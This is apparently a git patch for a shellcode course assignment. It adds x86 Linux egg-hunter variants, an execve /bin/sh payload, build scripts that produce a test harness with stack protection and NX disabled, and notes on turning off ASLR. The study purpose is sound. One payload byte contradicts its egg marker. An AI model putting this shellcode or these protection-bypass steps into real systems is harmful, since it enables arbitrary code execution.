From 85d99f6ce8fd9a1572b924645c778900d4e362f9 Mon Sep 17 00:00:00 2001 From: arno01 Date: Thu, 28 Mar 2013 13:20:50 +0100 Subject: [PATCH] Assignment 3 - major update --- exam3/access-noloop/NOTES | 11 +++ exam3/access-noloop/USAGE | 27 +++++ exam3/access-noloop/hunter.nasm | 87 ++++++++++++++++ exam3/access-noloop/make.sh | 132 +++++++++++++++++++++++++ exam3/access-noloop/payload.nasm | 44 +++++++++ exam3/access-noloop/shellcode.c | 20 ++++ exam3/access-scasd-noloop/NOTES | 11 +++ exam3/access-scasd-noloop/USAGE | 27 +++++ exam3/access-scasd-noloop/hunter.nasm | 92 +++++++++++++++++ exam3/access-scasd-noloop/make.sh | 132 +++++++++++++++++++++++++ exam3/access-scasd-noloop/payload.nasm | 44 +++++++++ exam3/access-scasd-noloop/shellcode.c | 20 ++++ exam3/access-scasd/NOTES | 11 +++ exam3/access-scasd/USAGE | 27 +++++ exam3/access-scasd/hunter.nasm | 61 ++++++++++++ exam3/access-scasd/make.sh | 130 ++++++++++++++++++++++++ exam3/access-scasd/payload.nasm | 44 +++++++++ exam3/access-scasd/shellcode.c | 18 ++++ exam3/access/NOTES | 11 +++ exam3/access/USAGE | 27 +++++ exam3/access/hunter.nasm | 59 +++++++++++ exam3/access/make.sh | 130 ++++++++++++++++++++++++ exam3/access/payload.nasm | 44 +++++++++ exam3/access/shellcode.c | 18 ++++ exam3/basic/NOTES | 11 +++ exam3/basic/USAGE | 27 +++++ exam3/basic/hunter.nasm | 40 ++++++++ exam3/basic/make.sh | 130 ++++++++++++++++++++++++ exam3/basic/payload.nasm | 44 +++++++++ exam3/basic/shellcode | Bin 0 -> 5100 bytes exam3/basic/shellcode.c | 18 ++++ 31 files changed, 1497 insertions(+) create mode 100644 exam3/access-noloop/NOTES create mode 100644 exam3/access-noloop/USAGE create mode 100644 exam3/access-noloop/hunter.nasm create mode 100755 exam3/access-noloop/make.sh create mode 100644 exam3/access-noloop/payload.nasm create mode 100644 exam3/access-noloop/shellcode.c create mode 100644 exam3/access-scasd-noloop/NOTES create mode 100644 exam3/access-scasd-noloop/USAGE create mode 100644 exam3/access-scasd-noloop/hunter.nasm create mode 100755 exam3/access-scasd-noloop/make.sh create mode 100644 exam3/access-scasd-noloop/payload.nasm create mode 100644 exam3/access-scasd-noloop/shellcode.c create mode 100644 exam3/access-scasd/NOTES create mode 100644 exam3/access-scasd/USAGE create mode 100644 exam3/access-scasd/hunter.nasm create mode 100755 exam3/access-scasd/make.sh create mode 100644 exam3/access-scasd/payload.nasm create mode 100644 exam3/access-scasd/shellcode.c create mode 100644 exam3/access/NOTES create mode 100644 exam3/access/USAGE create mode 100644 exam3/access/hunter.nasm create mode 100755 exam3/access/make.sh create mode 100644 exam3/access/payload.nasm create mode 100644 exam3/access/shellcode.c create mode 100644 exam3/basic/NOTES create mode 100644 exam3/basic/USAGE create mode 100644 exam3/basic/hunter.nasm create mode 100755 exam3/basic/make.sh create mode 100644 exam3/basic/payload.nasm create mode 100755 exam3/basic/shellcode create mode 100644 exam3/basic/shellcode.c diff --git a/exam3/access-noloop/NOTES b/exam3/access-noloop/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access-noloop/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access-noloop/USAGE b/exam3/access-noloop/USAGE new file mode 100644 index 0000000..a27d412 --- /dev/null +++ b/exam3/access-noloop/USAGE @@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-noloop$ ./make.sh "HereItIs" + [I] Using custom EGG mark: HereItIs + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5260 Mar 28 13:01 ./shellcode + [+] All done! + +3. Run the shellcode + +access-noloop$ ./shellcode +Hunter Length: 66 +Payload Length: 36 +sh-4.1$ + diff --git a/exam3/access-noloop/hunter.nasm b/exam3/access-noloop/hunter.nasm new file mode 100644 index 0000000..712a8e3 --- /dev/null +++ b/exam3/access-noloop/hunter.nasm @@ -0,0 +1,87 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access +noloop modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; function Prologue + push ebp + mov ebp, esp + + ; preserve registers and flags + pushad + pushfd + + + ; Used for cmp edx, esi below + push 0xfffefff + pop esi + inc esi + + xor edx, edx ; Searching the whole memory + + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: +; cmp edx, 0xffff000 + cmp edx, esi ; We don't want NULL bytes + jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg) + + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x8] ; next address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + cmp dword [edx], egg1 + jne nextAddr + cmp dword [edx+0x4], egg2 + jne nextAddr + + lea ecx, [edx+0x8] + jmp ecx + +Return: + ; restore registers and stack + popfd + popad + + ; function Epilogue + mov esp, ebp + pop ebp + + ret diff --git a/exam3/access-noloop/make.sh b/exam3/access-noloop/make.sh new file mode 100755 index 0000000..a305e35 --- /dev/null +++ b/exam3/access-noloop/make.sh @@ -0,0 +1,132 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." +HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} +EOF + +echo " [+] Compiling shellcode.c ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-noloop/payload.nasm b/exam3/access-noloop/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-noloop/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-noloop/shellcode.c b/exam3/access-noloop/shellcode.c new file mode 100644 index 0000000..d205ccf --- /dev/null +++ b/exam3/access-noloop/shellcode.c @@ -0,0 +1,20 @@ +#include +#include + +unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\x31\xd2\x39\xf2\x74\x2a\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x08\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\x81\x3a\x48\x65\x72\x65\x75\xe9\x81\x7a\x04\x49\x74\x49\x73\x75\xe0\x8d\x4a\x08\xff\xe1\x9d\x61\x89\xec\x5d\xc3"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x12\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} diff --git a/exam3/access-scasd-noloop/NOTES b/exam3/access-scasd-noloop/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access-scasd-noloop/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access-scasd-noloop/USAGE b/exam3/access-scasd-noloop/USAGE new file mode 100644 index 0000000..87206e1 --- /dev/null +++ b/exam3/access-scasd-noloop/USAGE @@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-scasd-noloop$ ./make.sh "HereItIs" + [I] Using custom EGG mark: HereItIs + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5260 Mar 28 13:14 ./shellcode + [+] All done! + + +3. Run the shellcode + +access-scasd-noloop$ ./shellcode +Hunter Length: 68 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access-scasd-noloop/hunter.nasm b/exam3/access-scasd-noloop/hunter.nasm new file mode 100644 index 0000000..3774230 --- /dev/null +++ b/exam3/access-scasd-noloop/hunter.nasm @@ -0,0 +1,92 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access-scasd +noloop modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + ; function Prologue + push ebp + mov ebp, esp + + ; preserve registers and flags + pushad + pushfd + + + ; Used for cmp edx, esi below + push 0xfffefff + pop esi + inc esi + + + cld ; clear direction flag (DF) to use scasd properly + xor edx, edx ; Searching the whole memory + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: +; cmp edx, 0xffff000 + cmp edx, esi ; We don't want NULL bytes + jz Return ; Egg Hunter will go for retirement (i.e. we simply prevent forever-loop in case if there is no Egg) + + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x4] ; address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + mov eax, egg1 + mov edi, edx + scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4 + jnz nextAddr + + mov eax, egg2 + lea edi, [edx+4] ; address to check + scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4 + jnz nextAddr + jmp edi + +Return: + ; restore registers and stack + popfd + popad + + ; function Epilogue + mov esp, ebp + pop ebp + + ret + diff --git a/exam3/access-scasd-noloop/make.sh b/exam3/access-scasd-noloop/make.sh new file mode 100755 index 0000000..a305e35 --- /dev/null +++ b/exam3/access-scasd-noloop/make.sh @@ -0,0 +1,132 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm +ld -m elf_i386 -o hunter hunter.o + +echo " [+] Extracting PAYLOAD code from payload ..." +PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s) + +echo " [+] Adding EGG mark to PAYLOAD ..." +FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g') + +echo " [+] Checking PAYLOAD code for NULLs ..." +if [[ $FULL_PAYLOADCODE == *00* ]]; then + echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +echo " [+] Extracting HUNTER code from hunter ..." +HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g') + +# For debugging only +#echo ${DEFAULTEGG[0]} +#echo ${DEFAULTEGG[1]} +#echo ${NEWEGG[0]} +#echo ${NEWEGG[1]} + +# Preparing Default egg to HEX form in order to replace it with a New egg +DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in HEX format +NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') +NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g') + +# Uncomment to save new EGGMARK in Plaintext format +#NEWEGG1=$(echo -n ${NEWEGG[0]}) +#NEWEGG2=$(echo -n ${NEWEGG[1]}) + + +FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g') + +echo " [+] Checking HUNTER code for NULLs ..." +if [[ $FULL_HUNTERCODE == *00* ]]; then + echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting." + exit 1 +fi + + +# Uncomment to see what will is replaced (default egg with a new one) +#echo $DEFEGG1 +#echo $DEFEGG2 +#echo $NEWEGG1 +#echo $NEWEGG2 +#echo $HUNTERCODE +#echo $FULL_HUNTERCODE + +cat > shellcode.c << EOF +#include +#include + +unsigned char hunter[] = \ +$FULL_HUNTERCODE; + +unsigned char garbage1[] = \ +"Just some garbage here..."; + +unsigned char payload[] = \ +$FULL_PAYLOADCODE; + +unsigned char garbage2[] = \ +"And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} +EOF + +echo " [+] Compiling shellcode.c ..." +gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode + +# Cleanup +rm -f payload.o payload hunter.o hunter + +ls -la ./shellcode + +echo " [+] All done!" diff --git a/exam3/access-scasd-noloop/payload.nasm b/exam3/access-scasd-noloop/payload.nasm new file mode 100644 index 0000000..1ab23b8 --- /dev/null +++ b/exam3/access-scasd-noloop/payload.nasm @@ -0,0 +1,44 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . + +; Filename: payload-execve-stack.nasm +; Author: Andrey Arapov +; 2013 March + +global _start + + +section .text + +_start: + ; EAX + xor eax, eax + mov al, 11 ; execve syscall + + ; EBX + xor edx, edx + push edx ; NULL termination of '//bin/sh' string + push 0x68732f6e ; '//bin/sh' in reverse + push 0x69622f2f ; beginning of '//bin/sh' string is here + mov ebx, esp ; put the address of '//bin/sh' into ebx via esp + + ; ECX + push edx ; NULL termination of a stack + push ebx ; load our '//bin/sh' on a stack + mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string. + + ; EDX + push edx ; NULL terminator + mov edx, esp ; EDX is a PTR to a stack which has an address to NULL. + int 0x80 + diff --git a/exam3/access-scasd-noloop/shellcode.c b/exam3/access-scasd-noloop/shellcode.c new file mode 100644 index 0000000..343e1fd --- /dev/null +++ b/exam3/access-scasd-noloop/shellcode.c @@ -0,0 +1,20 @@ +#include +#include + +unsigned char hunter[] = "\x55\x89\xe5\x60\x9c\x68\xff\xef\xff\x0f\x5e\x46\xfc\x31\xd2\x39\xf2\x74\x2b\x66\x81\xca\xff\x0f\x42\x6a\x21\x58\x8d\x5a\x04\x31\xc9\xcd\x80\x3c\xf2\x74\xe8\xb8\x48\x65\x72\x65\x89\xd7\xaf\x75\xe7\xb8\x49\x74\x49\x73\x8d\x7a\x04\xaf\x75\xdc\xff\xe7\x9d\x61\x89\xec\x5d\xc3"; + +unsigned char garbage1[] = "Just some garbage here..."; + +unsigned char payload[] = "\x48\x65\x72\x65\x49\x74\x49\x73\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80"; + +unsigned char garbage2[] = "And some garbage there..."; + +main() +{ + printf("Hunter Length: %d\n", strlen(hunter)); + printf("Payload Length: %d\n", strlen(payload)); + int (*ret)() = (int(*)())hunter; + ret(); + + printf("NO LOOP!\n"); +} diff --git a/exam3/access-scasd/NOTES b/exam3/access-scasd/NOTES new file mode 100644 index 0000000..088dd00 --- /dev/null +++ b/exam3/access-scasd/NOTES @@ -0,0 +1,11 @@ +NOTES + + no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice + + execstack: disables Executable space protection (NX). + Or Data Execution Prevention (DEP) on Windows, + or Write XOR Execute (W^X) on BSD. + CPU’s NX bit ("Never eXecute"). + + To disalbe Address Space Layout Randomization (ASLR) when running binary + setarch `arch` -R ./program diff --git a/exam3/access-scasd/USAGE b/exam3/access-scasd/USAGE new file mode 100644 index 0000000..83fad02 --- /dev/null +++ b/exam3/access-scasd/USAGE @@ -0,0 +1,27 @@ +USAGE + +1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable) + + +2. Compile the shellcode with a custom "egg" (must be 8 bytes in length) + +access-scasd$ ./make.sh "MyEgg123" + [I] Using custom EGG mark: MyEgg123 + [+] Compiling payload.nasm ... + [+] Compiling hunter.nasm ... + [+] Extracting PAYLOAD code from payload ... + [+] Adding EGG mark to PAYLOAD ... + [+] Checking PAYLOAD code for NULLs ... + [+] Extracting HUNTER code from hunter ... + [+] Checking HUNTER code for NULLs ... + [+] Compiling shellcode.c ... +-rwx------. 1 arno arno 5132 Mar 27 23:37 ./shellcode + [+] All done! + + +3. Run the shellcode + +access-scasd$ ./shellcode +Hunter Length: 46 +Payload Length: 36 +sh-4.1$ diff --git a/exam3/access-scasd/hunter.nasm b/exam3/access-scasd/hunter.nasm new file mode 100644 index 0000000..5017a13 --- /dev/null +++ b/exam3/access-scasd/hunter.nasm @@ -0,0 +1,61 @@ +; This program is free software: you can redistribute it and/or modify +; it under the terms of the GNU General Public License as published by +; the Free Software Foundation, either version 3 of the License, or +; (at your option) any later version. +; +; This program is distributed in the hope that it will be useful, +; but WITHOUT ANY WARRANTY; without even the implied warranty of +; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +; GNU General Public License for more details. +; +; You should have received a copy of the GNU General Public License +; along with this program. If not, see . +; +; +; Filename: hunter.nasm *access-scasd modification +; Author: Andrey Arapov +; 2013 March +; +; + +section .data + egg1 equ "Egg-" ; DWORD Egg marker part1 + egg2 equ "Mark" ; DWORD Egg marker part2 + + +section .text +global _start + + +_start: + cld ; clear direction flag (DF) to use scasd properly + xor edx, edx ; Searching the whole memory + + ; We will scan memory page-by-page and only accessible pages will be scanned for the Egg marker +nextPage: + or dx, 0xfff ; The same as "add dx, 4095" (PAGE_SIZE) + +nextAddr: + inc edx ; Searching forward + + ; Checking if memory is accessible + push byte +0x21 ; 0x21 = 33 = __NR_access + pop eax ; EAX points to 0x21 + lea ebx, [edx+0x4] ; address to check + xor ecx, ecx ; 0: mode = F_OK + int 0x80 + cmp al, -14 ; -14 = EFAULT = Bad address. See /usr/include/asm-generic/errno-base.h + jz nextPage + + + ; Searching for the Egg marker (in current page of memory which is accessible) + mov eax, egg1 + mov edi, edx + scasd ; if EAX == EDI, then sets ZF and returns EDI which has address of = edx+0x4 + jnz nextAddr + + mov eax, egg2 + lea edi, [edx+4] ; address to check + scasd ; if EAX == EDI, then sets ZF and returns edi which has address of = edx+0x4 + jnz nextAddr + jmp edi diff --git a/exam3/access-scasd/make.sh b/exam3/access-scasd/make.sh new file mode 100755 index 0000000..00c5f73 --- /dev/null +++ b/exam3/access-scasd/make.sh @@ -0,0 +1,130 @@ +#!/usr/bin/env sh +# +# USAGE +# ./make.sh [Egg-Mark] +# +# NOTE +# Egg-Mark must be a plaintext with 8 bytes in length +# If Egg-Mark was not specified, the default one will be used. +# +# To specify a custom payload, simply modify the code of payload.nasm file. +# Alternativly, you can modify PAYLOADCODE= variable down below the code. +# + +ARG1=$1 + +if [ -z "$ARG1" ]; then + echo " [I] Argument not specified. Using default EGG mark." + ARG1="Egg-Mark"; +elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then + echo " [E] Custom EGG mark must be 8 bytes in length! Exiting." + exit 1; +else + echo " [I] Using custom EGG mark: "$ARG1 +fi + + +DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm +EGGMARK=$ARG1 +NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g')) + +# Uncomment to save EGGMARK in HEX +EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g') + +# Cleanup +rm -f shellcode payload.o payload hunter.o hunter + +echo " [+] Compiling payload.nasm ..." +nasm -f elf32 -o payload.o payload.nasm +ld -m elf_i386 -o payload payload.o + +echo " [+] Compiling hunter.nasm ..." +nasm -f elf32 -o hunter.o hunter.nasm 